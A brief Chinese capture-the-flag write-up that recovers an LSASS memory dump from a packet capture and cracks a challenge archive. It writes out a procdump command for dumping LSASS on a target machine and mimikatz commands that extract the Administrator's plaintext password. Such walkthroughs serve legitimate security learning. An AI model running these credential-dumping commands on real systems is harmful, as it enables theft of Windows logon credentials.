题目下载

对流量包进行文件提取（output）命令，得到一个加密的压缩包文件。
用Wireshark打开，文件→导出对象→HTTP，发现lsass.dmp。
通过这道题我也GET到了新知识点ww开心。

lsass是windows系统的一个进程，用于本地安全和登陆策略。

题外话：

如何获取lsass.dmp？
可以用procdump（下载地址）。procdump是微软官方提供的一个小工具。
将工具拷贝到目标机器上执行如下命令（需要管理员权限）
procdump.exe -accepteula -ma lsass.exe lsass.dmp

既然这道题的lsass.dmp已经dump出来了，就可以利用mimikatz（米米卡tz）获取administrator的密码。

参考1：
介绍一下神器mimikatz，从lsass里抓密码 | Jarett's Blog
参考2：
Windows密码抓取总结 | TimeS0ng's blog
米米卡tz的下载地址：
Release 2.2.0 20200104 - lsadump & Chrome · gentilkiwi/mimikatz · GitHub

下载完毕后，把lsass.dmp拖到mimikatz.exe的目录下，双击mimikatz.exe：

privilege::debug
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full

*Username:Administrator
*Domain:WIN7
*Password:W3lc0meToD0g3

password就是压缩文件的密码，解压得到flag。